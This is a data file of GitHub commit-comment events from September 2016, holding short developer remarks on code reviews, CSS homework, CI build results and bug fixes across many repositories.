{"id":"4616396281","type":"CommitCommentEvent","actor":{"login":"mzyy94"},"repo":{"name":"Harekaze/Harekaze-iOS"},"payload":{"comment":{"id":19168995,"position":9,"line":55,"path":"Harekaze/ViewControllers/Settings/ChinachuWUISelectionViewController.swift","commit_id":"0e63b40d013f010b9332bf6428a79bb3b3afe5c4","created_at":"2016-09-26T08:26:35Z","updated_at":"2016-09-26T08:26:35Z","body":"self.alertView.divider.color set and other part delete"}},"created_at":"2016-09-26T08:26:35Z"}
{"id":"4616398509","type":"CommitCommentEvent","actor":{"login":"Damnian"},"repo":{"name":"Damnian/task-no.-19"},"payload":{"comment":{"id":19168997,"position":311,"line":311,"path":"css/styles19.css","commit_id":"84fde12eb3641dd8cd34c11c411a3c36f7a660f1","created_at":"2016-09-26T08:27:05Z","updated_at":"2016-09-26T08:27:05Z","body":"This are two buttons with different text inside. \r\nHmm, i called them like as their content, but now i look and think, that this class could be called simply: \"button\" (?) "}},"created_at":"2016-09-26T08:27:05Z"}
{"id":"4616398871","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19168999,"position":null,"line":null,"path":null,"commit_id":"4922d00dfe5df7e147b9bbffde80d5de9e936ef8","created_at":"2016-09-26T08:27:11Z","updated_at":"2016-09-26T08:27:11Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1159](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14219&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 252, ignored: 3 Build time: 00:11:02"}},"created_at":"2016-09-26T08:27:11Z"}
{"id":"4616401072","type":"CommitCommentEvent","actor":{"login":"Damnian"},"repo":{"name":"Damnian/task-no.-19"},"payload":{"comment":{"id":19169004,"position":322,"line":322,"path":"css/styles19.css","commit_id":"84fde12eb3641dd8cd34c11c411a3c36f7a660f1","created_at":"2016-09-26T08:27:42Z","updated_at":"2016-09-26T08:27:42Z","body":"xD\r\n#piekłoperfekcjonistów\r\n#nerwicanatręctw"}},"created_at":"2016-09-26T08:27:42Z"}
{"id":"4616401256","type":"CommitCommentEvent","actor":{"login":"zapelin"},"repo":{"name":"zapelin/collab-github-v2"},"payload":{"comment":{"id":19169005,"position":null,"line":null,"path":null,"commit_id":"81acad525d9651d3ca5d33f877d3a880bfbc1fc2","created_at":"2016-09-26T08:27:45Z","updated_at":"2016-09-26T08:27:45Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://localhost:8080/ui#review:id=1034)"}},"created_at":"2016-09-26T08:27:45Z"}
{"id":"4616404159","type":"CommitCommentEvent","actor":{"login":"happymeter"},"repo":{"name":"happymeter/meter"},"payload":{"comment":{"id":19169008,"position":null,"line":null,"path":null,"commit_id":"dd6407c5944425ef190463a91ed12f1e2ace1dfe","created_at":"2016-09-26T08:28:23Z","updated_at":"2016-09-26T08:28:23Z","body":"This is a tools project by meter ! There are many tools for coder ,you can easy to use it in you program........\r\nCreated by meter,2016.09.26"}},"created_at":"2016-09-26T08:28:23Z"}
{"id":"4616405877","type":"CommitCommentEvent","actor":{"login":"seletskiy"},"repo":{"name":"shagabutdinov/dotfiles"},"payload":{"comment":{"id":19169011,"position":61,"line":452,"path":"user/bin/ushell-env","commit_id":"d9c123955e2148a4a3bf3694c178d1dd599958aa","created_at":"2016-09-26T08:28:47Z","updated_at":"2016-09-26T08:28:47Z","body":"bitbucket?"}},"created_at":"2016-09-26T08:28:47Z"}
{"id":"4616408376","type":"CommitCommentEvent","actor":{"login":"mzyy94"},"repo":{"name":"Harekaze/Harekaze-iOS"},"payload":{"comment":{"id":19169014,"position":28,"line":121,"path":"Harekaze/ViewControllers/Timers/TimerDetailTableViewController.swift","commit_id":"af844f8f38f379392247ce179cd3302b61aafac0","created_at":"2016-09-26T08:29:22Z","updated_at":"2016-09-26T08:29:22Z","body":"remove as ?"}},"created_at":"2016-09-26T08:29:22Z"}
{"id":"4616419402","type":"CommitCommentEvent","actor":{"login":"stefek99"},"repo":{"name":"driftyco/ionic2-starter-sidemenu"},"payload":{"comment":{"id":19169031,"position":11,"line":11,"path":"README.md","commit_id":"d09a367359159b8c44c9fbc9b2d184f0730c6066","created_at":"2016-09-26T08:31:59Z","updated_at":"2016-09-26T08:31:59Z","body":"Awesome! https://github.com/driftyco/ionic2-starter-sidemenu/commit/ef4829f445d58c09e98eecdc5b1fa0543b50aaf2 (many thanks)"}},"created_at":"2016-09-26T08:31:59Z"}
{"id":"4616427594","type":"CommitCommentEvent","actor":{"login":"Damnian"},"repo":{"name":"Damnian/task-no.-19"},"payload":{"comment":{"id":19169043,"position":406,"line":406,"path":"css/styles19.css","commit_id":"84fde12eb3641dd8cd34c11c411a3c36f7a660f1","created_at":"2016-09-26T08:33:55Z","updated_at":"2016-09-26T08:33:55Z","body":"I had a problem with heart and \"before\"/\"after\"...\r\nI wanted to this line was flexible, but not longer than lorem ipsum with class .text with width: 625px;"}},"created_at":"2016-09-26T08:33:55Z"}
{"id":"4616430392","type":"CommitCommentEvent","actor":{"login":"tsivarev"},"repo":{"name":"VKCOM/vk-java-sdk"},"payload":{"comment":{"id":19169048,"position":null,"line":null,"path":null,"commit_id":"fd5ac9aa6a43074276713596eb4a79f6c313cd91","created_at":"2016-09-26T08:34:35Z","updated_at":"2016-09-26T08:34:35Z","body":"close #2 "}},"created_at":"2016-09-26T08:34:35Z"}
{"id":"4616430927","type":"CommitCommentEvent","actor":{"login":"jannakha"},"repo":{"name":"uqlibrary/uqlibrary-reusable-components"},"payload":{"comment":{"id":19169050,"position":9,"line":159,"path":"applications/careerhub/load.js","commit_id":"be86ab59bcc39bf375dec78d1a1c58d520188eeb","created_at":"2016-09-26T08:34:43Z","updated_at":"2016-09-26T08:34:43Z","body":"replace a list of the urls with a regex please"}},"created_at":"2016-09-26T08:34:43Z"}
{"id":"4616434771","type":"CommitCommentEvent","actor":{"login":"holylight008"},"repo":{"name":"holylight008/WebProject"},"payload":{"comment":{"id":19169059,"position":null,"line":null,"path":null,"commit_id":"1d80acf35ad8384628c7fa9bc8343d2593c04a51","created_at":"2016-09-26T08:35:37Z","updated_at":"2016-09-26T08:35:37Z","body":"Finish Homework 3"}},"created_at":"2016-09-26T08:35:37Z"}
{"id":"4616439133","type":"CommitCommentEvent","actor":{"login":"qinsvn"},"repo":{"name":"qinsvn/2016repository"},"payload":{"comment":{"id":19169066,"position":null,"line":null,"path":null,"commit_id":"b14b072be438a92c596cb7e7156694d2a9341277","created_at":"2016-09-26T08:36:39Z","updated_at":"2016-09-26T08:36:39Z","body":"是否"}},"created_at":"2016-09-26T08:36:39Z"}
{"id":"4616446934","type":"CommitCommentEvent","actor":{"login":"Xmen097"},"repo":{"name":"lesves/game-blacklist"},"payload":{"comment":{"id":19169076,"position":null,"line":null,"path":null,"commit_id":"508d3374e58dd0f6bf572c521ec8fbf09547e3d5","created_at":"2016-09-26T08:38:25Z","updated_at":"2016-09-26T08:38:25Z","body":"jOLANDA"}},"created_at":"2016-09-26T08:38:25Z"}
{"id":"4616447840","type":"CommitCommentEvent","actor":{"login":"PoojaMounica"},"repo":{"name":"PoojaMounica/MyProject"},"payload":{"comment":{"id":19169080,"position":8,"line":6,"path":"README.md","commit_id":"9e0c7fc062634ee483644778df7273d28d784eec","created_at":"2016-09-26T08:38:38Z","updated_at":"2016-09-26T08:38:38Z","body":"and got Married recently."}},"created_at":"2016-09-26T08:38:38Z"}
{"id":"4616449300","type":"CommitCommentEvent","actor":{"login":"mtrojnar"},"repo":{"name":"OpenSC/libp11"},"payload":{"comment":{"id":19169088,"position":null,"line":null,"path":null,"commit_id":"3678317e49906ebe095ca0800741513f75b46f82","created_at":"2016-09-26T08:38:59Z","updated_at":"2016-09-26T08:38:59Z","body":"https://github.com/OpenSC/libp11/commit/7573c6e800cae3b429ae018c6a6bcdfe61bc1b4b should address the caching concerns.  The CKA_ALWAYS_AUTHENTICATE PIN is retrieved from UI rather than of from `spriv->prev_pin`."}},"created_at":"2016-09-26T08:38:59Z"}
{"id":"4616452551","type":"CommitCommentEvent","actor":{"login":"saliceti"},"repo":{"name":"alphagov/paas-bootstrap"},"payload":{"comment":{"id":19169092,"position":70,"line":70,"path":"concourse/pipelines/destroy.yml","commit_id":"3e2fe543258100e2ddbbeace48f34b18609a9803","created_at":"2016-09-26T08:39:45Z","updated_at":"2016-09-26T08:39:45Z","body":"Removed, thanks."}},"created_at":"2016-09-26T08:39:45Z"}
{"id":"4616453501","type":"CommitCommentEvent","actor":{"login":"Damnian"},"repo":{"name":"Damnian/task-no.-19"},"payload":{"comment":{"id":19169096,"position":460,"line":460,"path":"css/styles19.css","commit_id":"84fde12eb3641dd8cd34c11c411a3c36f7a660f1","created_at":"2016-09-26T08:39:58Z","updated_at":"2016-09-26T08:39:58Z","body":"I wanted, the resolution changed over?/above? 720px.\r\nI mean that with resolution 720px we have standard  class styles and it changes only from 721 to 1366px, and later from 1367<..."}},"created_at":"2016-09-26T08:39:58Z"}
{"id":"4616453747","type":"CommitCommentEvent","actor":{"login":"zapelin"},"repo":{"name":"zapelin/collab-github-v2"},"payload":{"comment":{"id":19169097,"position":1,"line":1,"path":"zxczxc","commit_id":"81acad525d9651d3ca5d33f877d3a880bfbc1fc2","created_at":"2016-09-26T08:40:01Z","updated_at":"2016-09-26T08:40:01Z","body":"dfsdfsdfas"}},"created_at":"2016-09-26T08:40:01Z"}
{"id":"4616456691","type":"CommitCommentEvent","actor":{"login":"zapelin"},"repo":{"name":"zapelin/collab-github-v2"},"payload":{"comment":{"id":19169102,"position":null,"line":null,"path":null,"commit_id":"6ad772947afb57a5b7f80a055a0b9aaba084eceb","created_at":"2016-09-26T08:40:41Z","updated_at":"2016-09-26T08:40:41Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://localhost:8080/ui#review:id=1035)"}},"created_at":"2016-09-26T08:40:41Z"}
{"id":"4616457362","type":"CommitCommentEvent","actor":{"login":"ochiait"},"repo":{"name":"ochiait/kadai_asagao"},"payload":{"comment":{"id":19169105,"position":null,"line":null,"path":null,"commit_id":"e73577f4e711e44b9d823fd109b306a53d520e98","created_at":"2016-09-26T08:40:51Z","updated_at":"2016-09-26T08:40:51Z","body":"<img width=\"896\" alt=\"2016-09-26 17 37 05\" src=\"https://cloud.githubusercontent.com/assets/8113901/18827931/4da8face-8410-11e6-865e-9ec153703208.png\">\r\n"}},"created_at":"2016-09-26T08:40:51Z"}
{"id":"4616461670","type":"CommitCommentEvent","actor":{"login":"gricey432"},"repo":{"name":"JosephGarrone/uq-parking-stats"},"payload":{"comment":{"id":19169111,"position":null,"line":null,"path":null,"commit_id":"77085a3da2765220317a4a11a92b010dd397fbb4","created_at":"2016-09-26T08:41:50Z","updated_at":"2016-09-26T08:41:50Z","body":"np"}},"created_at":"2016-09-26T08:41:50Z"}
{"id":"4616466726","type":"CommitCommentEvent","actor":{"login":"Lonnytunes"},"repo":{"name":"makinacorpus/drupal-ucms"},"payload":{"comment":{"id":19169119,"position":6,"line":545,"path":"ucms_contrib/ucms_contrib.module","commit_id":"7ee33e68827d79c29016d5dee9468b15032361ed","created_at":"2016-09-26T08:42:59Z","updated_at":"2016-09-26T08:42:59Z","body":"Good question, but that's your own code so I think you can probably find the answer ;-)."}},"created_at":"2016-09-26T08:42:59Z"}
{"id":"4616466752","type":"CommitCommentEvent","actor":{"login":"zhukailun123"},"repo":{"name":"zhukailun123/-"},"payload":{"comment":{"id":19169120,"position":null,"line":null,"path":null,"commit_id":"b68862c0a8cfea8d10ca078a61630eb9f28d4144","created_at":"2016-09-26T08:43:00Z","updated_at":"2016-09-26T08:43:00Z","body":"..."}},"created_at":"2016-09-26T08:43:00Z"}
{"id":"4616467325","type":"CommitCommentEvent","actor":{"login":"taifeng1205"},"repo":{"name":"guolinke/deep-learning-benchmarks"},"payload":{"comment":{"id":19169121,"position":null,"line":null,"path":null,"commit_id":"b04b8a7ec1ad0eeb96ba44f604cc1fa9882acbaf","created_at":"2016-09-26T08:43:08Z","updated_at":"2016-09-26T08:43:08Z","body":"will this affect the speed of training? "}},"created_at":"2016-09-26T08:43:08Z"}
{"id":"4616470481","type":"CommitCommentEvent","actor":{"login":"britram"},"repo":{"name":"mami-project/pathspider"},"payload":{"comment":{"id":19169127,"position":null,"line":null,"path":null,"commit_id":"2bc6c8444161e016569499d1d817e73549ebbd69","created_at":"2016-09-26T08:43:51Z","updated_at":"2016-09-26T08:43:51Z","body":"question: why stringify the datetime? (is this faster, or does it just make debugging easier?)"}},"created_at":"2016-09-26T08:43:51Z"}
{"id":"4616472643","type":"CommitCommentEvent","actor":{"login":"maloconcarne"},"repo":{"name":"RosadinTV/RosadinTV.github.io"},"payload":{"comment":{"id":19169128,"position":null,"line":null,"path":null,"commit_id":"805b30033ebe5b963f257882ab0e0b30a6eb73d3","created_at":"2016-09-26T08:44:20Z","updated_at":"2016-09-26T08:44:20Z","body":"Excelente, lo esperare con ansias :)\r\n"}},"created_at":"2016-09-26T08:44:20Z"}
{"id":"4616477334","type":"CommitCommentEvent","actor":{"login":"mroswald"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":19169139,"position":4,"line":19,"path":"local-cli/runAndroid/runAndroid.js","commit_id":"dd6370fed2bb5c6e10660ab7ecca33c95c198311","created_at":"2016-09-26T08:45:18Z","updated_at":"2016-09-26T08:45:18Z","body":"@jreziga was that intented?"}},"created_at":"2016-09-26T08:45:18Z"}
{"id":"4616485985","type":"CommitCommentEvent","actor":{"login":"buggins"},"repo":{"name":"buggins/hibernated"},"payload":{"comment":{"id":19169149,"position":null,"line":null,"path":null,"commit_id":"8a0f710feac573b45e2a54035bc71eb32018cd15","created_at":"2016-09-26T08:47:09Z","updated_at":"2016-09-26T08:47:09Z","body":"Thank you! Let me fix it."}},"created_at":"2016-09-26T08:47:09Z"}
{"id":"4616486926","type":"CommitCommentEvent","actor":{"login":"alex-ab"},"repo":{"name":"alex-ab/genode"},"payload":{"comment":{"id":19169150,"position":null,"line":null,"path":null,"commit_id":"3929cf729997dfcf3656de32401462dbc441b957","created_at":"2016-09-26T08:47:23Z","updated_at":"2016-09-26T08:47:23Z","body":"@chelmuth: please add to staging"}},"created_at":"2016-09-26T08:47:23Z"}
{"id":"4616489595","type":"CommitCommentEvent","actor":{"login":"allustin"},"repo":{"name":"silverbulleters/vanessa-behavior"},"payload":{"comment":{"id":19169153,"position":5,"line":1278,"path":"src/vanessa-behavior/Form/УправляемаяФорма/Форма.bsl","commit_id":"4e9957537c587daa0a695a2c2b2efa65fb6f67ec","created_at":"2016-09-26T08:47:59Z","updated_at":"2016-09-26T08:47:59Z","body":"не будет работать в Linux - там именна файлов нельзя преобразовывать @alehinsasha - обрати внимание\r\n"}},"created_at":"2016-09-26T08:47:59Z"}
{"id":"4616492658","type":"CommitCommentEvent","actor":{"login":"LouisGac"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19169159,"position":null,"line":null,"path":null,"commit_id":"3854578fcde31efc902753f6b4db425a091ec094","created_at":"2016-09-26T08:48:39Z","updated_at":"2016-09-26T08:48:39Z","body":"I'd say good enough for now (unless it's very easy to fix it). \r\nNext time we work on this, we'd rather rewrite it from scratch. "}},"created_at":"2016-09-26T08:48:39Z"}
{"id":"4616494038","type":"CommitCommentEvent","actor":{"login":"zjffdu"},"repo":{"name":"apache/spark"},"payload":{"comment":{"id":19169161,"position":19,"line":213,"path":"docs/submitting-applications.md","commit_id":"7db55faa70ebbd157e9ef0ee678bd972c2b5c32a","created_at":"2016-09-26T08:48:55Z","updated_at":"2016-09-26T08:48:55Z","body":"Internally actually it is transmitted through `--files`. Do you suggest to enforce its name to be `requirements.txt` and pass it through `--files` ? "}},"created_at":"2016-09-26T08:48:55Z"}
{"id":"4616495582","type":"CommitCommentEvent","actor":{"login":"TesterHub"},"repo":{"name":"JosteinHansoft/bugTest"},"payload":{"comment":{"id":19169168,"position":null,"line":null,"path":null,"commit_id":"da505ef6a5bf36908b4c692612e91a5b7b7bbd76","created_at":"2016-09-26T08:49:16Z","updated_at":"2016-09-26T08:49:16Z","body":"new something"}},"created_at":"2016-09-26T08:49:16Z"}
{"id":"4616495936","type":"CommitCommentEvent","actor":{"login":"sankha93"},"repo":{"name":"i-break-codes/racex"},"payload":{"comment":{"id":19169169,"position":null,"line":null,"path":null,"commit_id":"0884faa9d060c4150b45f733f105a54105cffcbf","created_at":"2016-09-26T08:49:21Z","updated_at":"2016-09-26T08:49:21Z","body":"Yuck! 😂"}},"created_at":"2016-09-26T08:49:21Z"}
{"id":"4616496744","type":"CommitCommentEvent","actor":{"login":"ElementalKiss"},"repo":{"name":"ElementalKiss/Django"},"payload":{"comment":{"id":19169170,"position":null,"line":null,"path":null,"commit_id":"b48638371685104538fbaf13ad151989a1c83ab0","created_at":"2016-09-26T08:49:33Z","updated_at":"2016-09-26T08:49:33Z","body":"I dont know. :)"}},"created_at":"2016-09-26T08:49:33Z"}
{"id":"4616497989","type":"CommitCommentEvent","actor":{"login":"Damnian"},"repo":{"name":"Damnian/task-no.-19"},"payload":{"comment":{"id":19169173,"position":470,"line":470,"path":"css/styles19.css","commit_id":"84fde12eb3641dd8cd34c11c411a3c36f7a660f1","created_at":"2016-09-26T08:49:49Z","updated_at":"2016-09-26T08:49:49Z","body":"Because then this padding decreases and increases with device height (?).\r\nOtherwise (probably) header p would be hidden under .panel-form with `position: absolute`."}},"created_at":"2016-09-26T08:49:49Z"}
{"id":"4616498898","type":"CommitCommentEvent","actor":{"login":"joost-de-vries"},"repo":{"name":"Isammoc/play-angular2-typescript"},"payload":{"comment":{"id":19169175,"position":null,"line":null,"path":null,"commit_id":"d40e427a40aed05af5eee98d625de85bfbd78bbc","created_at":"2016-09-26T08:50:01Z","updated_at":"2016-09-26T08:50:01Z","body":"Thanks. \r\nThis reminds me that I'm thinking of changing the Angular2 demo application from TodoMvc into the [Tour of Heroes](https://github.com/johnpapa/angular2-tour-of-heroes) app that they use [in the Angular2 docs](https://github.com/Isammoc/play-angular2-typescript.git).\r\nI see that you keep RxJs on version beta 9. I'm surprised that works. I think that RC7 requires RxJs beta 12. And currently `sbt-typescript` [doesn't work with that version](https://github.com/joost-de-vries/sbt-typescript/issues/9). "}},"created_at":"2016-09-26T08:50:01Z"}
{"id":"4616501436","type":"CommitCommentEvent","actor":{"login":"singsuyash"},"repo":{"name":"jez/vim-as-an-ide"},"payload":{"comment":{"id":19169182,"position":null,"line":null,"path":null,"commit_id":"dff7da32daeb87dc5aa8c6c279f07fb22fcbafed","created_at":"2016-09-26T08:50:32Z","updated_at":"2016-09-26T08:50:32Z","body":"Will these additions to the vimrc file be reflected immediately if i for example create a HelloWorld.js file and start editing it in vim ?"}},"created_at":"2016-09-26T08:50:32Z"}
{"id":"4616504728","type":"CommitCommentEvent","actor":{"login":"Gillou68310"},"repo":{"name":"mupen64plus-ae/mupen64plus-ae"},"payload":{"comment":{"id":19169189,"position":null,"line":null,"path":null,"commit_id":"9f1da102240c8070fd9fafce5c9416dab6260eb4","created_at":"2016-09-26T08:51:14Z","updated_at":"2016-09-26T08:51:14Z","body":"Thanks for the infos ;-)"}},"created_at":"2016-09-26T08:51:14Z"}
{"id":"4616506208","type":"CommitCommentEvent","actor":{"login":"vvworm"},"repo":{"name":"vvworm/insuranceQA"},"payload":{"comment":{"id":19169192,"position":null,"line":null,"path":null,"commit_id":"1c12f4663632772630a95dc3257eb9191ab38c76","created_at":"2016-09-26T08:51:32Z","updated_at":"2016-09-26T08:51:32Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Api : get invitations, activate invitations](https://trello.com/c/GeXWBhSU/56-api-get-invitations-activate-invitations)"}},"created_at":"2016-09-26T08:51:32Z"}
{"id":"4616507450","type":"CommitCommentEvent","actor":{"login":"Pr-Mex"},"repo":{"name":"silverbulleters/vanessa-behavior"},"payload":{"comment":{"id":19169195,"position":5,"line":1278,"path":"src/vanessa-behavior/Form/УправляемаяФорма/Форма.bsl","commit_id":"4e9957537c587daa0a695a2c2b2efa65fb6f67ec","created_at":"2016-09-26T08:51:50Z","updated_at":"2016-09-26T08:51:50Z","body":"Надо добавить сборку для Linux."}},"created_at":"2016-09-26T08:51:50Z"}
{"id":"4616515839","type":"CommitCommentEvent","actor":{"login":"graingert"},"repo":{"name":"python/cpython"},"payload":{"comment":{"id":19169208,"position":null,"line":null,"path":null,"commit_id":"d7bf0e86c35fca35d1ad25d78434b1f596020ed0","created_at":"2016-09-26T08:53:23Z","updated_at":"2016-09-26T08:53:23Z","body":"@tomviner Maybe this should be in the repl machinery instead?"}},"created_at":"2016-09-26T08:53:23Z"}
{"id":"4616516438","type":"CommitCommentEvent","actor":{"login":"glensc"},"repo":{"name":"resin-io/qemu"},"payload":{"comment":{"id":19169209,"position":null,"line":null,"path":null,"commit_id":"782e5bb77014ff136f7bb6133a911e5f53e914a7","created_at":"2016-09-26T08:53:32Z","updated_at":"2016-09-26T08:53:32Z","body":"@petrosagg looks like your v3 patch needs rebase against 2.7.0"}},"created_at":"2016-09-26T08:53:32Z"}
{"id":"4616517365","type":"CommitCommentEvent","actor":{"login":"Damnian"},"repo":{"name":"Damnian/task-no.-19"},"payload":{"comment":{"id":19169211,"position":472,"line":472,"path":"css/styles19.css","commit_id":"84fde12eb3641dd8cd34c11c411a3c36f7a660f1","created_at":"2016-09-26T08:53:44Z","updated_at":"2016-09-26T08:53:44Z","body":"Why not?\r\nThis section has ID: #flights because menu is ?zakotwiczone? to specific ID with html/js. \r\nI have four section like this. I (we) did the same in my portfolio."}},"created_at":"2016-09-26T08:53:44Z"}
{"id":"4616517603","type":"CommitCommentEvent","actor":{"login":"zapelin"},"repo":{"name":"zapelin/collab-github-v2"},"payload":{"comment":{"id":19169212,"position":null,"line":null,"path":null,"commit_id":"39a4c21cc7be8ec170d34a5c962fe26b3aeb20d7","created_at":"2016-09-26T08:53:48Z","updated_at":"2016-09-26T08:53:48Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://localhost:8080/ui#review:id=1036)"}},"created_at":"2016-09-26T08:53:48Z"}
{"id":"4616519369","type":"CommitCommentEvent","actor":{"login":"albertomorenoacevedo"},"repo":{"name":"albertomorenoacevedo/albertoma.github.io"},"payload":{"comment":{"id":19169217,"position":1,"line":1,"path":"index.html","commit_id":"0789a1cda049802af267f761c7295939d22d7fc4","created_at":"2016-09-26T08:54:11Z","updated_at":"2016-09-26T08:54:11Z","body":"hghchghgv\r\n"}},"created_at":"2016-09-26T08:54:11Z"}
{"id":"4616524169","type":"CommitCommentEvent","actor":{"login":"petrosagg"},"repo":{"name":"resin-io/qemu"},"payload":{"comment":{"id":19169228,"position":null,"line":null,"path":null,"commit_id":"782e5bb77014ff136f7bb6133a911e5f53e914a7","created_at":"2016-09-26T08:55:11Z","updated_at":"2016-09-26T08:55:11Z","body":"Indeed. It's in my plans to release a version based on the new QEMU"}},"created_at":"2016-09-26T08:55:11Z"}
{"id":"4616525110","type":"CommitCommentEvent","actor":{"login":"Lonnytunes"},"repo":{"name":"makinacorpus/drupal-ucms"},"payload":{"comment":{"id":19169232,"position":36,"line":197,"path":"ucms_site/src/NodeManager.php","commit_id":"7ee33e68827d79c29016d5dee9468b15032361ed","created_at":"2016-09-26T08:55:21Z","updated_at":"2016-09-26T08:55:21Z","body":"I did that because of the _node_submit()_ function, but I misread it...  \r\nJust unset the property would have been sufficient."}},"created_at":"2016-09-26T08:55:21Z"}
{"id":"4616525127","type":"CommitCommentEvent","actor":{"login":"torkelo"},"repo":{"name":"grafana/grafana"},"payload":{"comment":{"id":19169231,"position":null,"line":null,"path":null,"commit_id":"effd2098ee86d0af116908bce42a4097cf395840","created_at":"2016-09-26T08:55:21Z","updated_at":"2016-09-26T08:55:21Z","body":"what was the issue, can't spot it "}},"created_at":"2016-09-26T08:55:21Z"}
{"id":"4616527443","type":"CommitCommentEvent","actor":{"login":"Damnian"},"repo":{"name":"Damnian/task-no.-19"},"payload":{"comment":{"id":19169234,"position":541,"line":541,"path":"css/styles19.css","commit_id":"84fde12eb3641dd8cd34c11c411a3c36f7a660f1","created_at":"2016-09-26T08:55:51Z","updated_at":"2016-09-26T08:55:51Z","body":"I will check it."}},"created_at":"2016-09-26T08:55:51Z"}
{"id":"4616528451","type":"CommitCommentEvent","actor":{"login":"zapelin"},"repo":{"name":"zapelin/collab-github-v2"},"payload":{"comment":{"id":19169237,"position":1,"line":1,"path":"https","commit_id":"6618956b63bf2f991527b9e063e8b741e828ac6b","created_at":"2016-09-26T08:56:03Z","updated_at":"2016-09-26T08:56:03Z","body":"asdasd"}},"created_at":"2016-09-26T08:56:03Z"}
{"id":"4616539788","type":"CommitCommentEvent","actor":{"login":"Damnian"},"repo":{"name":"Damnian/task-no.-19"},"payload":{"comment":{"id":19169252,"position":36,"line":36,"path":"index.html","commit_id":"84fde12eb3641dd8cd34c11c411a3c36f7a660f1","created_at":"2016-09-26T08:58:25Z","updated_at":"2016-09-26T08:58:25Z","body":"Okay, i will remember"}},"created_at":"2016-09-26T08:58:25Z"}
{"id":"4616540964","type":"CommitCommentEvent","actor":{"login":"bergquist"},"repo":{"name":"grafana/grafana"},"payload":{"comment":{"id":19169255,"position":26,"line":101,"path":"pkg/services/alerting/eval_context.go","commit_id":"effd2098ee86d0af116908bce42a4097cf395840","created_at":"2016-09-26T08:58:40Z","updated_at":"2016-09-26T08:58:40Z","body":"This SprintF generated a full URL. renderer.go then formats it again but places localhost in front it so the final url used for phantomJS looked something like http://localhost:3000/http://grafana-monitor.raintank.io/render...."}},"created_at":"2016-09-26T08:58:40Z"}
{"id":"4616544244","type":"CommitCommentEvent","actor":{"login":"lassediercks"},"repo":{"name":"lassediercks/design"},"payload":{"comment":{"id":19169264,"position":null,"line":null,"path":null,"commit_id":"20fc405b043a9e0f0f57aabefeff73eb2af7c60f","created_at":"2016-09-26T08:59:22Z","updated_at":"2016-09-26T08:59:22Z","body":"also I fixed a bug in the tags"}},"created_at":"2016-09-26T08:59:22Z"}
{"id":"4616545730","type":"CommitCommentEvent","actor":{"login":"bergquist"},"repo":{"name":"grafana/grafana"},"payload":{"comment":{"id":19169268,"position":32,"line":77,"path":"pkg/services/alerting/notifier.go","commit_id":"effd2098ee86d0af116908bce42a4097cf395840","created_at":"2016-09-26T08:59:41Z","updated_at":"2016-09-26T08:59:41Z","body":"I moved the code here since there was no other correct usage of GetImageUrl()  "}},"created_at":"2016-09-26T08:59:41Z"}
{"id":"4616547834","type":"CommitCommentEvent","actor":{"login":"Airborn22"},"repo":{"name":"Airborn22/vakvarju"},"payload":{"comment":{"id":19169275,"position":null,"line":null,"path":null,"commit_id":"95eb1cebeddb484d31dc4338917a1c66155ae3a6","created_at":"2016-09-26T09:00:07Z","updated_at":"2016-09-26T09:00:07Z","body":"![Szeptember 26. - Hétfő](http://ujlipot.vakvarju.com/data/napimenu/20.jpg?v=1474635451)\nMagyaros gombaleves vajas galuskával\r\nRántott csirkemell rizi-bizivel\r\nJoghurtos gyümölcsszelet"}},"created_at":"2016-09-26T09:00:07Z"}
{"id":"4616550268","type":"CommitCommentEvent","actor":{"login":"DerouineauNicolas"},"repo":{"name":"gpac/gpac"},"payload":{"comment":{"id":19169280,"position":21,"line":3316,"path":"applications/mp4box/main.c","commit_id":"19863d71e326d47e508d8641f34c39de7c9e443d","created_at":"2016-09-26T09:00:36Z","updated_at":"2016-09-26T09:00:36Z","body":"I suppose this is because of the Bool type initialized as 0. I'm going to remove these two variables for the moment."}},"created_at":"2016-09-26T09:00:36Z"}
{"id":"4616552137","type":"CommitCommentEvent","actor":{"login":"bergquist"},"repo":{"name":"grafana/grafana"},"payload":{"comment":{"id":19169286,"position":6,"line":57,"path":"pkg/services/alerting/notifiers/webhook.go","commit_id":"effd2098ee86d0af116908bce42a4097cf395840","created_at":"2016-09-26T09:00:58Z","updated_at":"2016-09-26T09:00:58Z","body":"The image url for webhook pointed to the internal url used for rendering the Image. Which is wrong. Now points to the public image."}},"created_at":"2016-09-26T09:00:58Z"}
{"id":"4616557759","type":"CommitCommentEvent","actor":{"login":"torkelo"},"repo":{"name":"grafana/grafana"},"payload":{"comment":{"id":19169292,"position":26,"line":101,"path":"pkg/services/alerting/eval_context.go","commit_id":"effd2098ee86d0af116908bce42a4097cf395840","created_at":"2016-09-26T09:02:09Z","updated_at":"2016-09-26T09:02:09Z","body":"ah, now I see it!"}},"created_at":"2016-09-26T09:02:09Z"}
{"id":"4616565356","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19169303,"position":null,"line":null,"path":null,"commit_id":"96bd4d3642912ce1bfe4dfa24102285d24cda49d","created_at":"2016-09-26T09:03:46Z","updated_at":"2016-09-26T09:03:46Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/36053/testReport/) for this commit**"}},"created_at":"2016-09-26T09:03:46Z"}
{"id":"4616565583","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19169304,"position":null,"line":null,"path":null,"commit_id":"dfb0915b3613b9374bd2f2932d498bc6fb0dd7b7","created_at":"2016-09-26T09:03:49Z","updated_at":"2016-09-26T09:03:49Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/36052/testReport/) for this commit**"}},"created_at":"2016-09-26T09:03:49Z"}
